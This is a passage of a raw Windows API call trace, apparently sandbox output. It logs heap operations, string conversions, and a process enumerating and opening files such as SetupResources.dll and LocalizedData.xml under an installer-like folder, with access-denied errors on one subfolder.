dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e068 [0061.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4dff8 [0061.062] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e068 | out: hHeap=0x20000) returned 1 [0061.062] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4dff8 | out: hHeap=0x20000) returned 1 [0061.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.063] AreFileApisANSI () returned 1 [0061.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 45 [0061.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5a) returned 0x71960 [0061.063] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4e030, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=45 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml") returned 45 [0061.063] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1042\\LocalizedData.xml" (normalized: "c:\\588bce7c90097ed212\\1042\\localizeddata.xml"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0x5398dc00, ftCreationTime.dwHighDateTime=0x1cac6fe, ftLastAccessTime.dwLowDateTime=0x5398dc00, ftLastAccessTime.dwHighDateTime=0x1cac6fe, ftLastWriteTime.dwLowDateTime=0x5398dc00, ftLastWriteTime.dwHighDateTime=0x1cac6fe, nFileSizeHigh=0x0, nFileSizeLow=0xfed6)) returned 1 [0061.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0061.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e030 | out: hHeap=0x20000) returned 1 [0061.063] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.063] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.063] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="SetupResources.dll", cAlternateFileName="SETUPR~1.DLL")) returned 1 [0061.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x887c0 [0061.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x887c0 | out: hHeap=0x20000) returned 1 [0061.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0061.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df88 [0061.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3b0 [0061.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df88 | out: hHeap=0x20000) returned 1 [0061.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0061.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3b0 | out: hHeap=0x20000) returned 1 [0061.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0061.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cfa0 [0061.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f088 [0061.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.063] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f088 | out: hHeap=0x20000) returned 1 [0061.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e260 [0061.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x53640 [0061.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.063] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x715b8 [0061.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53640 | out: hHeap=0x20000) returned 1 [0061.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x60) returned 0x71620 [0061.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x715b8 | out: hHeap=0x20000) returned 1 [0061.064] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.064] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.064] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.064] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71620 | out: hHeap=0x20000) returned 1 [0061.064] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e260 | out: hHeap=0x20000) returned 1 [0061.064] AreFileApisANSI () returned 1 [0061.064] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1042\\SetupResources.dll", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1042\\SetupResources.dll", lpUsedDefaultChar=0x0) returned 46 [0061.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.064] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.064] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfa0 [0061.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cfb0 [0061.064] AreFileApisANSI () returned 1 [0061.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.064] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71a98 [0061.064] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71a98, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 46 [0061.186] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.186] GetFileType (hFile=0x41c) returned 0x1 [0061.186] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71a98 | out: hHeap=0x20000) returned 1 [0061.187] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5e8 | out: lpNewFilePointer=0x0) returned 1 [0061.187] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f59c | out: lpNewFilePointer=0x0) returned 1 [0061.188] SetFilePointerEx (in: hFile=0x41c, liDistanceToMove=0x0, lpNewFilePointer=0x0, dwMoveMethod=0x313f5b4 | out: lpNewFilePointer=0x0) returned 1 [0061.188] CloseHandle (hObject=0x41c) returned 1 [0061.189] AreFileApisANSI () returned 1 [0061.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71960 [0061.189] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71960, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 46 [0061.189] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x41c [0061.189] GetFileType (hFile=0x41c) returned 0x1 [0061.189] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71960 | out: hHeap=0x20000) returned 1 [0061.189] CloseHandle (hObject=0x41c) returned 1 [0061.189] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0d8 [0061.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e420 [0061.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e228 [0061.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e298 [0061.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e228 | out: hHeap=0x20000) returned 1 [0061.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e420 | out: hHeap=0x20000) returned 1 [0061.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0d8 | out: hHeap=0x20000) returned 1 [0061.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e298 | out: hHeap=0x20000) returned 1 [0061.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e340 [0061.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1f0 [0061.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e340 | out: hHeap=0x20000) returned 1 [0061.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1f0 | out: hHeap=0x20000) returned 1 [0061.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e3e8 [0061.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0061.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df18 [0061.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4df50 [0061.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df18 | out: hHeap=0x20000) returned 1 [0061.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e3e8 | out: hHeap=0x20000) returned 1 [0061.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e0a0 [0061.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4df50 | out: hHeap=0x20000) returned 1 [0061.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e378 [0061.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e0a0 | out: hHeap=0x20000) returned 1 [0061.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e378 | out: hHeap=0x20000) returned 1 [0061.190] AreFileApisANSI () returned 1 [0061.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 46 [0061.190] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x5c) returned 0x71b68 [0061.190] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x4de70, cbMultiByte=-1, lpWideCharStr=0x71b68, cchWideChar=46 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1042\\SetupResources.dll") returned 46 [0061.190] GetFileAttributesExW (in: lpFileName="C:\\588bce7c90097ed212\\1042\\SetupResources.dll" (normalized: "c:\\588bce7c90097ed212\\1042\\setupresources.dll"), fInfoLevelId=0x0, lpFileInformation=0x313f6c0 | out: lpFileInformation=0x313f6c0*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xe40ff600, ftCreationTime.dwHighDateTime=0x1cac6d7, ftLastAccessTime.dwLowDateTime=0xe40ff600, ftLastAccessTime.dwHighDateTime=0x1cac6d7, ftLastWriteTime.dwLowDateTime=0xe40ff600, ftLastWriteTime.dwHighDateTime=0x1cac6d7, nFileSizeHigh=0x0, nFileSizeLow=0x3b58)) returned 1 [0061.190] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x71b68 | out: hHeap=0x20000) returned 1 [0061.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfb0 | out: hHeap=0x20000) returned 1 [0061.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cfa0 | out: hHeap=0x20000) returned 1 [0061.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.191] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.191] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.191] FindNextFileW (in: hFindFile=0x78f10, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x313f498, ftCreationTime.dwHighDateTime=0x5a, ftLastAccessTime.dwLowDateTime=0x313f420, ftLastAccessTime.dwHighDateTime=0x77892b2c, ftLastWriteTime.dwLowDateTime=0x46830, ftLastWriteTime.dwHighDateTime=0x313f210, nFileSizeHigh=0x5a, nFileSizeLow=0x0, dwReserved0=0x313f518, dwReserved1=0x77892bc0, cFileName="ce", cAlternateFileName="渘Ĉ㪀ā湈Ĉ̓㭘")) returned 0 [0061.191] FindClose (in: hFindFile=0x78f10 | out: hFindFile=0x78f10) returned 1 [0061.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d0a0 [0061.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f028 [0061.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d0a0 | out: hHeap=0x20000) returned 1 [0061.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f028 | out: hHeap=0x20000) returned 1 [0061.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53838 | out: hHeap=0x20000) returned 1 [0061.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e180 | out: hHeap=0x20000) returned 1 [0061.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x53298 | out: hHeap=0x20000) returned 1 [0061.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf00 | out: hHeap=0x20000) returned 1 [0061.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x46278 | out: hHeap=0x20000) returned 1 [0061.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7d010 [0061.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d010 | out: hHeap=0x20000) returned 1 [0061.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x4) returned 0x7cf70 [0061.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x14) returned 0x6f6a8 [0061.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf70 | out: hHeap=0x20000) returned 1 [0061.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x6f6a8 | out: hHeap=0x20000) returned 1 [0061.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4e1b8 [0061.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x68f40 [0061.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4e1b8 | out: hHeap=0x20000) returned 1 [0061.191] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x538c8 [0061.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x68f40 | out: hHeap=0x20000) returned 1 [0061.191] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.191] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.191] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.191] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.191] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x538c8 | out: hHeap=0x20000) returned 1 [0061.191] AreFileApisANSI () returned 1 [0061.192] WideCharToMultiByte (in: CodePage=0x0, dwFlags=0x0, lpWideCharStr="C:\\588bce7c90097ed212\\1043", cchWideChar=-1, lpMultiByteStr=0x313f604, cbMultiByte=260, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="C:\\588bce7c90097ed212\\1043", lpUsedDefaultChar=0x0) returned 27 [0061.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x20) returned 0x88400 [0061.192] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.192] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7cf10 [0061.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x8) returned 0x7d080 [0061.192] AreFileApisANSI () returned 1 [0061.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.192] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0061.192] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043") returned 27 [0061.192] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043" (normalized: "c:\\588bce7c90097ed212\\1043"), dwDesiredAccess=0x80000000, dwShareMode=0x3, lpSecurityAttributes=0x313f52c, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.192] GetLastError () returned 0x5 [0061.192] GetLastError () returned 0x5 [0061.192] SetLastError (dwErrCode=0x5) [0061.192] GetLastError () returned 0x5 [0061.192] SetLastError (dwErrCode=0x5) [0061.192] GetLastError () returned 0x5 [0061.192] SetLastError (dwErrCode=0x5) [0061.192] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0061.192] AreFileApisANSI () returned 1 [0061.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x0, cchWideChar=0 | out: lpWideCharStr=0x0) returned 27 [0061.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x36) returned 0x78f10 [0061.193] MultiByteToWideChar (in: CodePage=0x0, dwFlags=0x9, lpMultiByteStr=0x88400, cbMultiByte=-1, lpWideCharStr=0x78f10, cchWideChar=27 | out: lpWideCharStr="C:\\588bce7c90097ed212\\1043") returned 27 [0061.193] CreateFileW (lpFileName="C:\\588bce7c90097ed212\\1043" (normalized: "c:\\588bce7c90097ed212\\1043"), dwDesiredAccess=0xc0000000, dwShareMode=0x3, lpSecurityAttributes=0x313f5b8, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0061.193] GetLastError () returned 0x5 [0061.193] GetLastError () returned 0x5 [0061.193] SetLastError (dwErrCode=0x5) [0061.193] GetLastError () returned 0x5 [0061.193] SetLastError (dwErrCode=0x5) [0061.193] GetLastError () returned 0x5 [0061.193] SetLastError (dwErrCode=0x5) [0061.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x78f10 | out: hHeap=0x20000) returned 1 [0061.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7d080 | out: hHeap=0x20000) returned 1 [0061.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x7cf10 | out: hHeap=0x20000) returned 1 [0061.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x88400 | out: hHeap=0x20000) returned 1 [0061.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.193] InitOnceExecuteOnce (in: InitOnce=0x1086e18, InitFn=0x1013a80, Parameter=0x1086e48, Context=0x0 | out: InitOnce=0x1086e18, Parameter=0x1086e48, Context=0x0) returned 1 [0061.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x30) returned 0x4de70 [0061.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x46) returned 0x693f0 [0061.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x4de70 | out: hHeap=0x20000) returned 1 [0061.193] RtlAllocateHeap (HeapHandle=0x20000, Flags=0x0, Size=0x40) returned 0x534d8 [0061.193] HeapFree (in: hHeap=0x20000, dwFlags=0x0, lpMem=0x693f0 | out: hHeap=0x20000) returned 1 [0061.193] FindNextFileW (in: hFindFile=0x78e50, lpFindFileData=0x313f1a0 | out: lpFindFileData=0x313f1a0*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0xf37428cd, ftCreationTime.dwHighDateTime=0x1d327bd, ftLastAccessTime.dwLowDateTime=0xf37b4fe2, ftLastAccessTime.dwHighDateTime=0x1d327bd, ftLastWriteTime.dwLowDateTime=0xf38014a5, ftLastWriteTime.dwHighDateTime=0x1d327bd, nFileSizeHigh=0x0, nFileSizeLow=0x0, 